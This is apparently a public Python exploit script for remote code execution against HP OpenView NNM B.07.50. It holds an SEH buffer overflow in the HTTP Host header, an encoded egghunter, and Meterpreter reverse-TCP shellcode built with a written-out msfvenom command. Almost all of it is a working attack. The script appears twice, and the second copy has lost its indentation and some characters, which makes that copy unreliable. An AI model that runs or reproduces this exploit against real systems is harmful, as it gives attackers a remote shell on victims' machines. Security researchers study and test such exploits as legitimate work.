mgeeky/hp-openview-exploit.py

## hp-openview-exploit.py
#!/usr/bin/python
# HP OpenView NNM B.07.50 Remote Code Execution exploit
# by Mariusz B. / mgeeky, 17'

import struct
import socket

HOST = '192.168.XXX.YYY'
PORT = 7510

def exploit(conn):

    #
    # Return address in a Pop-Pop-Ret / SEH fashion to overwrite Exception handler:
    #
    # 0x6d213d2b : pop esi # pop ebp # ret
    #            | asciiprint,ascii {PAGE_EXECUTE_READ} [java.dll] ASLR: False, SafeSEH: False
    return_address = 0x6d213d2b
    ret = struct.pack('<I', return_address)

    junk = 'A' * (3381 - 4)

    #
    # Stage 1: Jump over handler's address
    #   71 08   JNO short $+8
    #   70 06   JO short $+6
    stage1 = '\x71\x08\x70\x06'

    stage2 = 'G' * 32

    # This is an windows 32-byte long egghunter
    # encoded with my custom ASCII encoder
    # Which can be located in this gist:
    #   https://gist.github.com/mgeeky/8a118c69312b35a9db7f19f61c7a6b3c
    egghunter  = r"%JMNU%521*TX-A777-i%"
    egghunter += r"%%-r2II-\ZZZP\%JMNU%"
    egghunter += r"521*-gNlN-zG1G-yQ1Q-"
    egghunter += r"1111P-cj10-v777-uX4X"
    egghunter += r"-xwxxP-NNNN-s1*z-J*r"
    egghunter += r"x-ttttP-5S%w-0n4v-nn"
    egghunter += r"nn-nnnnP-jj7j-vj%n-i"
    egghunter += r"t3y-jjjjP-d%ud-n1rf-"
    egghunter += r"7%tI-1111P-4Rfx-*5\v"
    egghunter += r"-92\y-\\\\P-p222-v2v"
    egghunter += r"v-O6wV-t%hkP"

    stage2 += egghunter
    stage2 += 'G' * 100
    stage2 += ':7510'

    exp = junk + stage1 + ret + stage2

    egg = 'T00WT00W'
    shellcode = ''

    #
    # Shellcode generated using MSFVENOM - leveraging BufferRegister option since our egghunter
    # at the end takes a long jump to the value of EDI register, which is a base for the shellcode.
    #
    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.XXX LPORT=443 \
    #       BufferRegister=EDI -f raw -e x86/alpha_mixed -b '\x00\x0a\x0d'
    # Payload size: 720 bytes
    #
    shellcode += "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0"
    shellcode += "BBABXP8ABuJI9lixk25PGps0apmY9ufQiPatNkf0"
    shellcode += "FPNkF2flNk1BEDlKT2gXFomg2ja6019oLlWLcQcL"
    shellcode += "DBtlGPJaxOvmuQKwzBYbQBSglKRr4PNkaZWLLKPL"
    shellcode += "4QSHkSSxuQkaf1Nk2yWPC1IClKg9FxjCVZbilK4t"
    shellcode += "LKEQJv5aYoLlzazotMVaYW5hKP1el6uSaml8Uk3M"
    shellcode += "5t1e9tbxNkaH5tWqN30fNkVlrkLKaHELEQKcnkWt"
    shellcode += "LK7qN0MYqTvDetCkaKcQByaJ619okP1OCo2zlK22"
    shellcode += "XknmQMBH7CGBc0C0axbWPsUbCo2tE8pLPwdf4GYo"
    shellcode += "IEh8j05QS0gp4iKtrtV0E8gYk00kuPyoZuSZc50h"
    shellcode += "YP98rDvWbHs25PC1MkniYvf0rp2pv0g0V0cpbpQx"
    shellcode += "XjTOyOM0yo9Ej7SZR0Bv67SXZ9mu0tPakOIElEIP"
    shellcode += "0tuZIobns8RU8lkXqqS0S0wprJC0PjeTv62wu8DB"
    shellcode += "n9hHQOiohUNcJX7pcNgFNkefSZaPsXwpVpwpeP2v"
    shellcode += "sZs0e8chLd2sM5KOKeNsF30jEPBvpSQG1xwr8YhH"
    shellcode += "qOIozuMSIhs03M4b1HRHWp3pgp30Qzs0pPBH4K4o"
    shellcode += "foVP9ozusgQxQe2N2mQqKOhUqNQN9ofletHibQYo"
    shellcode += "Yo9os1zcgYZf0uKwhCMkL0nUmr66PjS063IoXUAA"

    shellcode += "\xcc" * 500

    buf  = 'GET /topology/homeBaseView HTTP/1.1\r\n'
    buf += 'Host: ' + exp + '\r\n'
    buf += 'Content-Type: application/x-www-form-urlencoded\r\n'
    buf += 'User-Agent: ' + shellcode + '\r\n'
    buf += 'Content-Length: 1048580\r\n\r\n'
    buf += egg + shellcode

    print '[+] Sending HTTP packet of %d length...' % len(buf)
    print '\tHost header len: %d' % len(exp)
    print '\tEgghunter len: %d' % len(stage2)
    print '\tShellcode len: %d' % len(shellcode)
    print
    print '[?] Wait about 7-15 seconds until exploit kicks in.'
    conn.send(buf)

def main():
    print '[*] HP OpenView NNM B.07.50 Remote Code Execution exploit'
    print '[*] by Mariusz B. / mgeeky, 17'
    print
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        print '[.] Connecting with %s:%d...' % (HOST, PORT)
        conn = sock.connect((HOST, PORT))
        print '[+] Connected.'
    except:
        print '[!] Could not connect.'
        return None

    exploit(sock)
    sock.close()

if __name__ == '__main__':
    main()
	#!/usr/bin/python
	# HP OpenView NNM B.07.50 Remote Code Execution exploit
	# by Mariusz B. / mgeeky, 17'

	import struct
	import socket

	HOST = '192.168.XXX.YYY'
	PORT = 7510

	def exploit(conn):

	#
	# Return address in a Pop-Pop-Ret / SEH fashion to overwrite Exception handler:
	#
	# 0x6d213d2b : pop esi # pop ebp # ret
	# \| asciiprint,ascii {PAGE_EXECUTE_READ} [java.dll] ASLR: False, SafeSEH: False
	return_address = 0x6d213d2b
	ret = struct.pack('<I', return_address)

	junk = 'A' * (3381 - 4)

	#
	# Stage 1: Jump over handler's address
	# 71 08 JNO short $+8
	# 70 06 JO short $+6
	stage1 = '\x71\x08\x70\x06'

	stage2 = 'G' * 32

	# This is an windows 32-byte long egghunter
	# encoded with my custom ASCII encoder
	# Which can be located in this gist:
	# https://gist.github.com/mgeeky/8a118c69312b35a9db7f19f61c7a6b3c
	egghunter = r"%JMNU%521*TX-A777-i%"
	egghunter += r"%%-r2II-\ZZZP\%JMNU%"
	egghunter += r"521*-gNlN-zG1G-yQ1Q-"
	egghunter += r"1111P-cj10-v777-uX4X"
	egghunter += r"-xwxxP-NNNN-s1z-Jr"
	egghunter += r"x-ttttP-5S%w-0n4v-nn"
	egghunter += r"nn-nnnnP-jj7j-vj%n-i"
	egghunter += r"t3y-jjjjP-d%ud-n1rf-"
	egghunter += r"7%tI-1111P-4Rfx-*5\v"
	egghunter += r"-92\y-\\\\P-p222-v2v"
	egghunter += r"v-O6wV-t%hkP"

	stage2 += egghunter
	stage2 += 'G' * 100
	stage2 += ':7510'

	exp = junk + stage1 + ret + stage2

	egg = 'T00WT00W'
	shellcode = ''

	#
	# Shellcode generated using MSFVENOM - leveraging BufferRegister option since our egghunter
	# at the end takes a long jump to the value of EDI register, which is a base for the shellcode.
	#
	# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.XXX LPORT=443 \
	# BufferRegister=EDI -f raw -e x86/alpha_mixed -b '\x00\x0a\x0d'
	# Payload size: 720 bytes
	#
	shellcode += "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0"
	shellcode += "BBABXP8ABuJI9lixk25PGps0apmY9ufQiPatNkf0"
	shellcode += "FPNkF2flNk1BEDlKT2gXFomg2ja6019oLlWLcQcL"
	shellcode += "DBtlGPJaxOvmuQKwzBYbQBSglKRr4PNkaZWLLKPL"
	shellcode += "4QSHkSSxuQkaf1Nk2yWPC1IClKg9FxjCVZbilK4t"
	shellcode += "LKEQJv5aYoLlzazotMVaYW5hKP1el6uSaml8Uk3M"
	shellcode += "5t1e9tbxNkaH5tWqN30fNkVlrkLKaHELEQKcnkWt"
	shellcode += "LK7qN0MYqTvDetCkaKcQByaJ619okP1OCo2zlK22"
	shellcode += "XknmQMBH7CGBc0C0axbWPsUbCo2tE8pLPwdf4GYo"
	shellcode += "IEh8j05QS0gp4iKtrtV0E8gYk00kuPyoZuSZc50h"
	shellcode += "YP98rDvWbHs25PC1MkniYvf0rp2pv0g0V0cpbpQx"
	shellcode += "XjTOyOM0yo9Ej7SZR0Bv67SXZ9mu0tPakOIElEIP"
	shellcode += "0tuZIobns8RU8lkXqqS0S0wprJC0PjeTv62wu8DB"
	shellcode += "n9hHQOiohUNcJX7pcNgFNkefSZaPsXwpVpwpeP2v"
	shellcode += "sZs0e8chLd2sM5KOKeNsF30jEPBvpSQG1xwr8YhH"
	shellcode += "qOIozuMSIhs03M4b1HRHWp3pgp30Qzs0pPBH4K4o"
	shellcode += "foVP9ozusgQxQe2N2mQqKOhUqNQN9ofletHibQYo"
	shellcode += "Yo9os1zcgYZf0uKwhCMkL0nUmr66PjS063IoXUAA"

	shellcode += "\xcc" * 500

	buf = 'GET /topology/homeBaseView HTTP/1.1\r\n'
	buf += 'Host: ' + exp + '\r\n'
	buf += 'Content-Type: application/x-www-form-urlencoded\r\n'
	buf += 'User-Agent: ' + shellcode + '\r\n'
	buf += 'Content-Length: 1048580\r\n\r\n'
	buf += egg + shellcode

	print '[+] Sending HTTP packet of %d length...' % len(buf)
	print '\tHost header len: %d' % len(exp)
	print '\tEgghunter len: %d' % len(stage2)
	print '\tShellcode len: %d' % len(shellcode)
	print
	print '[?] Wait about 7-15 seconds until exploit kicks in.'
	conn.send(buf)

	def main():
	print '[*] HP OpenView NNM B.07.50 Remote Code Execution exploit'
	print '[*] by Mariusz B. / mgeeky, 17'
	print
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

	try:
	print '[.] Connecting with %s:%d...' % (HOST, PORT)
	conn = sock.connect((HOST, PORT))
	print '[+] Connected.'
	except:
	print '[!] Could not connect.'
	return None

	exploit(sock)
	sock.close()

	if __name__ == '__main__':
	main()